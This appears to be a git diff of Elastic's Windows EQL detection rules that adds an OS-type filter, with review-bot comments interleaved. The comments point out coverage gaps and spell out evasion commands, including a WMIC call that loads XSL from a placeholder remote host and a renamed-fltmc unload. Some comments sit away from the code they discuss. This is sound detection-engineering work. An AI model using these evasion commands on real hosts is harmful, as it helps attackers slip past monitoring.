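Review bot: `process.executable : "C:\\*"` and `not process.working_directory: "C:\\"` hard-code the system drive letter, whereas the other rules in this diff use the `?:\\` wildcard (for example `?:\\Windows\\SoftwareDistribution\\*.exe`); on a host whose system volume is not C: the rule never fires and nothing reveals it. Since the listed binaries all live under the Windows directory, `process.executable : "?:\\Windows\\*"` paired with `process.working_directory : "?:\\"` expresses "system binary, working directory at the root of a mounted volume" without assuming the letter, though that still needs a way to exclude the system volume itself (`not process.working_directory : "?:\\Windows*"` is not equivalent, so verify against real mount events). The process-name list continues past the end of the hunk.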
diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 2d128570b..38be37a16 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,9 +26,9 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : ("wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe", "regsvr32.exe", "svchost.exe", "dllhost.exe", "cmstp.exe")] - [file where event.type != "deletion" and + [file where host.os.type == "windows" and event.type != "deletion" and file.name : ("wscript.exe.log", "cscript.exe", "mshta.exe.log", diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index ddac84a0f..e4076050f 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" 
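Review bot: In the file leg's name list, `"cscript.exe"` sits between `"wscript.exe.log"` and `"mshta.exe.log"` and appears to be a typo for `"cscript.exe.log"`; as written it matches a file literally named cscript.exe rather than the managed-code host log for cscript, so the cscript case is effectively unmonitored. Change the entry to `"cscript.exe.log",`. The list and the rest of the file leg continue past the end of the hunk.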
@@ -88,7 +88,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.code == "10" and +process where host.os.type == "windows" and event.code == "10" and length(winlog.event_data.CallTrace) > 0 and /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */ diff --git a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml index fb47ca12b..22f8ba755 100644 --- a/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml +++ b/rules/windows/defense_evasion_suspicious_process_creation_calltrace.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -53,7 +53,7 @@ type = "eql" query = ''' sequence by host.id with maxspan=1m - [process where event.code == "1" and + [process where host.os.type == "windows" and event.code == "1" and /* sysmon process creation */ process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe", "fltldr.exe", "mspub.exe", "msaccess.exe","cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", @@ -70,7 +70,7 @@ sequence by host.id with maxspan=1m process.parent.name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe")) and not (process.parent.name : "regsvr32.exe" and process.parent.args : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*")) ] by process.parent.entity_id, process.entity_id - [process where event.code == "10" and + [process where host.os.type == "windows" and event.code == "10" and /* Sysmon process access event from unknown module */ winlog.event_data.CallTrace : "*UNKNOWN*"] by process.entity_id, winlog.event_data.TargetProcessGUID ''' 
diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index afd460234..a4acedba6 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=2m - [process where event.type == "start" + [process where host.os.type == "windows" and event.type == "start" and (process.code_signature.subject_name in ("Microsoft Corporation", "Microsoft Windows") and process.code_signature.trusted == true) and not process.executable : ( @@ -46,7 +46,7 @@ sequence by process.entity_id with maxspan=2m "?:\\Windows\\SysWOW64\\mobsync.exe", "?:\\Windows\\System32\\cmd.exe", "?:\\Windows\\SysWOW64\\cmd.exe")] - [library where event.type == "start" and dll.name : "scrobj.dll"] + [library where host.os.type == "windows" and event.type == "start" and dll.name : "scrobj.dll"] ''' diff --git a/rules/windows/defense_evasion_suspicious_short_program_name.toml b/rules/windows/defense_evasion_suspicious_short_program_name.toml index a5a42303f..ddea1b831 100644 --- a/rules/windows/defense_evasion_suspicious_short_program_name.toml +++ b/rules/windows/defense_evasion_suspicious_short_program_name.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -29,8 +29,8 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and length(process.name) > 0 and - length(process.name) == 5 and host.os.name == "Windows" and length(process.pe.original_file_name) > 5 +process where host.os.type == "windows" and event.type == "start" and length(process.name) > 0 and + length(process.name) == 5 and length(process.pe.original_file_name) > 5 ''' diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 72671aef2..2419da35e 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -25,11 +25,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan = 2m -[process where event.type == "start" and +[process where host.os.type == "windows" and event.type == "start" and (process.name : "WMIC.exe" or process.pe.original_file_name : "wmic.exe") and process.args : ("format*:*", "/format*:*", "*-format*:*") and not process.command_line : "* /format:table *"] -[any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and +[any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and (dll.name : ("jscript.dll", "vbscript.dll") or file.name : ("jscript.dll", "vbscript.dll"))] ''' diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 0614d257f..5949b2752 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml 
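Review bot: `length(process.name) > 0 and length(process.name) == 5` is redundant — the equality already implies a positive length — and reads like a leftover from the removed `host.os.name` clause; simplify to `process where host.os.type == "windows" and event.type == "start" and length(process.name) == 5 and length(process.pe.original_file_name) > 5`. Note also that `length(process.pe.original_file_name) > 5` evaluates false when the PE carries no OriginalFilename, so binaries without version info never match; if that is intended, say so in the rule's note. The hunk shows the whole query.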
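Review bot: The allowlist `not process.command_line : "* /format:table *"` keys on attacker-controlled text: any command line that also contains ` /format:table ` is suppressed, so if WMIC honours the last `/format` switch, `wmic ... /format:table /format:"http://x/evil.xsl"` loads the remote XSL and still passes, because the first leg's `process.args : ("format*:*", ...)` match is never re-checked against the surviving switch. Worth testing WMIC's switch precedence; if it is last-wins, narrow the exclusion so it only applies when `/format:table` is the sole format switch (for instance by additionally requiring no argument matching `*format*:*http*` or a UNC/file path). The hunk shows the whole query.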
+++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.name : "Zoom.exe" and process.name : ("cmd.exe", "powershell.exe", "pwsh.exe", "powershell_ise.exe") ''' diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 51196d9fb..6769d6a78 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -87,7 +87,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type != "deletion" and +file where host.os.type == "windows" and event.type != "deletion" and file.extension : ("exe", "dll") and process.name : ("smss.exe", "autochk.exe", diff --git a/rules/windows/defense_evasion_timestomp_sysmon.toml b/rules/windows/defense_evasion_timestomp_sysmon.toml index 5702483c5..8bfed4516 100644 --- a/rules/windows/defense_evasion_timestomp_sysmon.toml +++ b/rules/windows/defense_evasion_timestomp_sysmon.toml 
@@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/17" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -32,7 +32,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.code : "2" and +file where host.os.type == "windows" and event.code : "2" and /* Requires Sysmon EventID 2 - File creation time change */ event.action : "File creation time changed*" and diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index f50c1cd13..320bb0333 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -4,7 +4,7 @@ maturity = "production" integration = ["endpoint"] min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.4.0" -updated_date = "2022/11/22" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where +library where host.os.type == "windows" and process.code_signature.trusted == true and diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index 23a1c5593..3a3227421 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -4,7 +4,7 @@ integration = ["endpoint"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2023/01/27" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -library where process.pid == 4 and +library where host.os.type == "windows" and process.pid == 4 and dll.code_signature.trusted != true and not dll.code_signature.status : ("errorExpired", "errorRevoked") ''' diff --git a/rules/windows/defense_evasion_unusual_ads_file_creation.toml b/rules/windows/defense_evasion_unusual_ads_file_creation.toml index 9290a78e3..81455185f 100644 --- a/rules/windows/defense_evasion_unusual_ads_file_creation.toml +++ b/rules/windows/defense_evasion_unusual_ads_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/31" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -85,7 +85,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -file where event.type == "creation" and +file where host.os.type == "windows" and event.type == "creation" and file.path : "C:\\*:*" and not file.path : "C:\\*:zone.identifier*" and diff --git a/rules/windows/defense_evasion_unusual_dir_ads.toml b/rules/windows/defense_evasion_unusual_dir_ads.toml index 5d4a1eec4..1b713e8e0 100644 --- a/rules/windows/defense_evasion_unusual_dir_ads.toml +++ b/rules/windows/defense_evasion_unusual_dir_ads.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.args : "?:\\*:*" and process.args_count == 1 ''' 
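Review bot: Excluding `dll.code_signature.status : "errorRevoked"` removes the case most worth alerting on: a kernel driver loading under a certificate that has since been revoked is the leaked-signing-certificate / bring-your-own-driver pattern, and in practice a revoked certificate does not by itself stop a previously signed driver from loading. If the exclusion exists to quiet legacy cross-signed drivers, `errorExpired` already covers that; keep revoked certificates in scope with `not dll.code_signature.status : "errorExpired"`, or split revoked-certificate loads into their own higher-severity rule. The hunk shows the whole query.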
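Review bot: `file.path : "C:\\*:*"` and the `zone.identifier` exclusion hard-code the C: drive, while the `unusual_dir_ads` rule on this same page matches `process.args : "?:\\*:*"` and the rest of the diff uses `?:\\` throughout; an alternate data stream written on a data volume (`D:\share\doc.docx:payload`), or on a host whose system volume is not C:, never matches. Change the two lines to `file.path : "?:\\*:*" and` / `not file.path : "?:\\*:zone.identifier*" and`. The exclusion list continues past the end of the hunk.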
diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index 3d4e5e6e6..1e8d05fea 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -30,8 +30,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1m - [process where event.type == "start" and process.name : "dllhost.exe" and process.args_count == 1] - [network where process.name : "dllhost.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "dllhost.exe" and process.args_count == 1] + [network where host.os.type == "windows" and process.name : "dllhost.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index f804fa245..e7fdef8f0 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml 
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -61,8 +61,8 @@ type = "eql" query = ''' sequence by host.id, process.entity_id with maxspan=1m - [process where event.type == "start" and process.name : "rundll32.exe" and process.args_count == 1] - [network where process.name : "rundll32.exe" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "rundll32.exe" and process.args_count == 1] + [network where host.os.type == "windows" and process.name : "rundll32.exe" and not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 6bd5ac669..0b9943161 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] 
@@ -52,7 +52,7 @@ type = "eql" query = ''' sequence by process.entity_id - [process where (process.name : "Microsoft.Workflow.Compiler.exe" or + [process where host.os.type == "windows" and (process.name : "Microsoft.Workflow.Compiler.exe" or process.name : "bginfo.exe" or process.name : "cdb.exe" or process.name : "cmstp.exe" or @@ -65,7 +65,7 @@ sequence by process.entity_id process.name : "rcsi.exe" or process.name : "xwizard.exe") and event.type == "start"] - [network where (process.name : "Microsoft.Workflow.Compiler.exe" or + [network where host.os.type == "windows" and (process.name : "Microsoft.Workflow.Compiler.exe" or process.name : "bginfo.exe" or process.name : "cdb.exe" or process.name : "cmstp.exe" or diff --git a/rules/windows/defense_evasion_unusual_system_vp_child_program.toml b/rules/windows/defense_evasion_unusual_system_vp_child_program.toml index 0b2ab42b0..914b22e9f 100644 --- a/rules/windows/defense_evasion_unusual_system_vp_child_program.toml +++ b/rules/windows/defense_evasion_unusual_system_vp_child_program.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.parent.pid == 4 and not process.executable : ("Registry", "MemCompression", "?:\\Windows\\System32\\smss.exe") ''' diff --git a/rules/windows/defense_evasion_via_filter_manager.toml b/rules/windows/defense_evasion_via_filter_manager.toml index 627367799..063ed450d 100644 --- a/rules/windows/defense_evasion_via_filter_manager.toml +++ b/rules/windows/defense_evasion_via_filter_manager.toml 
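Review bot: Both legs spell the same process-name set as a chain of `process.name : "x" or process.name : "y" ...`, whereas every other rule in this diff uses the list form `process.name : ("a", "b", ...)`, and the repetition in the network leg is redundant because the sequence is already joined `by process.entity_id`, so the same process identity is guaranteed. Collapsing the first leg to a single list and reducing the second to `[network where host.os.type == "windows"]` (or the same list, if kept for readability) removes the chance of the two copies drifting apart. Both legs continue past the ends of their hunks.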
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic"] @@ -29,7 +29,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" and +process where host.os.type == "windows" and event.type == "start" and process.name : "fltMC.exe" and process.args : "unload" ''' diff --git a/rules/windows/defense_evasion_workfolders_control_execution.toml b/rules/windows/defense_evasion_workfolders_control_execution.toml index c24fe8aa5..8c7a51291 100644 --- a/rules/windows/defense_evasion_workfolders_control_execution.toml +++ b/rules/windows/defense_evasion_workfolders_control_execution.toml @@ -4,7 +4,7 @@ integration = ["windows"] maturity = "production" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" -updated_date = "2022/12/14" +updated_date = "2023/02/22" [rule] author = ["Elastic", "Austin Songer"] @@ -73,7 +73,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type == "start" +process where host.os.type == "windows" and event.type == "start" and process.name : "control.exe" and process.parent.name : "WorkFolders.exe" and not process.executable : ("?:\\Windows\\System32\\control.exe", "?:\\Windows\\SysWOW64\\control.exe") ''' diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml index 3b663b981..9a4ccb9c5 100644 --- a/rules/windows/defense_evasion_wsl_bash_exec.toml +++ b/rules/windows/defense_evasion_wsl_bash_exec.toml 
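Review bot: `process.name : "fltMC.exe"` is the only handle on the binary, so copying fltmc.exe under another name (`copy fltmc.exe f.exe & f.exe unload <filter>`) evades the rule, whereas the certutil, msdt and rundll32 rules in this diff pair the name with `process.pe.original_file_name`. Change the condition to `(process.name : "fltMC.exe" or process.pe.original_file_name : "fltMC.exe") and process.args : "unload"`, using `:` rather than `==` unless the exact OriginalFilename casing has been verified. The rest of the rule is outside the hunk.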
@@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/13" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -30,7 +30,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and ( ((process.executable : "?:\\Windows\\System32\\bash.exe" or process.pe.original_file_name == "Bash.exe") and not process.command_line : ("bash", "bash.exe")) or diff --git a/rules/windows/defense_evasion_wsl_child_process.toml b/rules/windows/defense_evasion_wsl_child_process.toml index 0b292074f..d06db7e0e 100644 --- a/rules/windows/defense_evasion_wsl_child_process.toml +++ b/rules/windows/defense_evasion_wsl_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and process.parent.executable : ("?:\\Windows\\System32\\wsl.exe", "?:\\Program Files*\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux_*\\wsl.exe", diff --git a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml index 22cd6db25..22516769f 100644 --- a/rules/windows/defense_evasion_wsl_enabled_via_dism.toml +++ b/rules/windows/defense_evasion_wsl_enabled_via_dism.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/01/13" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/13" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -26,7 +26,7 @@ timestamp_override = "event.ingested" type = "eql" query = ''' -process where event.type : "start" and +process where host.os.type == "windows" and event.type : "start" and (process.name : "Dism.exe" or process.pe.original_file_name == "DISM.EXE") and process.command_line : "*Microsoft-Windows-Subsystem-Linux*" ''' diff --git a/rules/windows/defense_evasion_wsl_filesystem.toml b/rules/windows/defense_evasion_wsl_filesystem.toml index fa8b181ba..543a35c65 100644 --- a/rules/windows/defense_evasion_wsl_filesystem.toml +++ b/rules/windows/defense_evasion_wsl_filesystem.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/12" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2023/01/12" +updated_date = "2023/02/22" min_stack_comments = "New fields added: required_fields, related_integrations, setup" min_stack_version = "8.3.0" @@ -27,11 +27,11 @@ type = "eql" query = ''' sequence by process.entity_id with maxspan=5m - [process where event.type == "start" and + [process where host.os.type == "windows" and event.type == "start" and process.name : "dllhost.exe" and /* Plan9FileSystem CLSID - WSL Host File System Worker */ process.command_line : "*{DFB65C4C-B34F-435D-AFE9-A86218684AA8}*"] - [file where process.name : "dllhost.exe" and not file.path : "?:\\Users\\*\\Downloads\\*"] + [file where host.os.type == "windows" and process.name : "dllhost.exe" and not file.path : "?:\\Users\\*\\Downloads\\*"] ''' diff --git a/rules/windows/defense_evasion_wsl_kalilinux.toml b/rules/windows/defense_evasion_wsl_kalilinux.toml index 3c2af853a..77d7a7363 100644 --- a/rules/windows/defense_evasion_wsl_kalilinux.toml +++ b/rules/windows/defense_evasion_wsl_kalilinux.toml 
@@ -2,7 +2,7 @@
 creation_date = "2023/01/12"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/12"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -26,7 +26,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 (process.name : "wsl.exe" and process.args : ("-d", "--distribution", "-i", "--install") and process.args : "kali*") or
 process.executable :
diff --git a/rules/windows/defense_evasion_wsl_registry_modification.toml b/rules/windows/defense_evasion_wsl_registry_modification.toml
index 8a205ce4f..dcf48d0e8 100644
--- a/rules/windows/defense_evasion_wsl_registry_modification.toml
+++ b/rules/windows/defense_evasion_wsl_registry_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/01/12"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/12"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where
+registry where host.os.type == "windows" and
 registry.path : ("HK*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\*\\PackageFamilyName", "\\REGISTRY\\*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\*\\PackageFamilyName")
diff --git a/rules/windows/discovery_adfind_command_activity.toml b/rules/windows/discovery_adfind_command_activity.toml
index 4f7ff2c6c..6133f4cf8 100644
--- a/rules/windows/discovery_adfind_command_activity.toml
+++ b/rules/windows/discovery_adfind_command_activity.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -73,7 +73,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "AdFind.exe" or process.pe.original_file_name == "AdFind.exe") and
 process.args : ("objectcategory=computer", "(objectcategory=computer)",
 "objectcategory=person", "(objectcategory=person)",
diff --git a/rules/windows/discovery_admin_recon.toml b/rules/windows/discovery_admin_recon.toml
index 73a8dc7b0..0a88a9387 100644
--- a/rules/windows/discovery_admin_recon.toml
+++ b/rules/windows/discovery_admin_recon.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -61,7 +61,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 (((process.name : "net.exe" or process.pe.original_file_name == "net.exe") or
 ((process.name : "net1.exe" or process.pe.original_file_name == "net1.exe") and
diff --git a/rules/windows/discovery_command_system_account.toml b/rules/windows/discovery_command_system_account.toml
index 4891fb998..8ac39d0e3 100644
--- a/rules/windows/discovery_command_system_account.toml
+++ b/rules/windows/discovery_command_system_account.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (?process.Ext.token.integrity_level_name : "System" or
 ?winlog.event_data.IntegrityLevel : "System") and
 (process.name : "whoami.exe" or
diff --git a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
index f8bec73ea..d4946f591 100644
--- a/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
+++ b/rules/windows/discovery_enumerating_domain_trusts_via_dsquery.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "dsquery.exe" or process.pe.original_file_name: "dsquery.exe") and
 process.args : "*objectClass=trustedDomain*"
 '''
